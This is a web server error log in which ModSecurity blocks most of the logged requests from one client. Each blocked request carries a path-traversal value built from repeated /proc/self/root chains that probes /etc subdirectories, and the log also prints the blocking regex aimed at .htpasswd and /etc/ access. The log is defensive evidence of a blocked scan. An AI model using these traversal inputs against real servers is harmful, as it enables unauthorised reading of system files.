[Fri Mar 20 09:36:59.044035 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:34362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_a9a6ubjKNq_cu4btqgAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:00.338868 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:46076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_bLninkcc-iUj5ApxegAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:01.689513 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:46088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_bfXLqtnMIWvjpaKtvQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:03.055875 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:46094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_bxCii7xarUs8iHZ7wQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:04.464056 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:46104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_cF1pVZ5mVmJwsFNEogAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:05.815343 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:46106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_cQF0L0L-SsrnPo58bgAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:07.165957 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:46120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_cxCii7xarUs8iHZ7wgAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:11.114479 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:34234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_deoXxyEfFpUF8f-UmQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:11.114857 2026] [mime_magic:error] [pid 7235:tid 140411641214720] (70014)End of file found: [client 57.141.18.124:50254] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:37:12.534747 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.243.128:34246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ePHIg5MgXLBnicMLWQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:13.868291 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:34258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_eTJ3M9BSuKP7CAY0FgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:15.237107 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:34270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_exCii7xarUs8iHZ7xwAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:17.458887 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:34274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_fPqxLDW4GITHUkT9bAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:18.821802 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:34278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_frninkcc-iUj5ApxhAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:20.212447 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:34372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_gPqxLDW4GITHUkT9bQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:21.540468 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:34374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_gTJ3M9BSuKP7CAY0GQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:22.916767 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:34388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ggF0L0L-SsrnPo58jgAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:24.242873 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:34394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_hF1pVZ5mVmJwsFNEsQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:25.612655 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:34406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_hQF0L0L-SsrnPo58lgAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:26.906693 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:34420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_hhCii7xarUs8iHZ70gAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:28.262981 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:34430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_iLninkcc-iUj5ApxiAAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:29.549445 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:44058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_iQF0L0L-SsrnPo58owAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
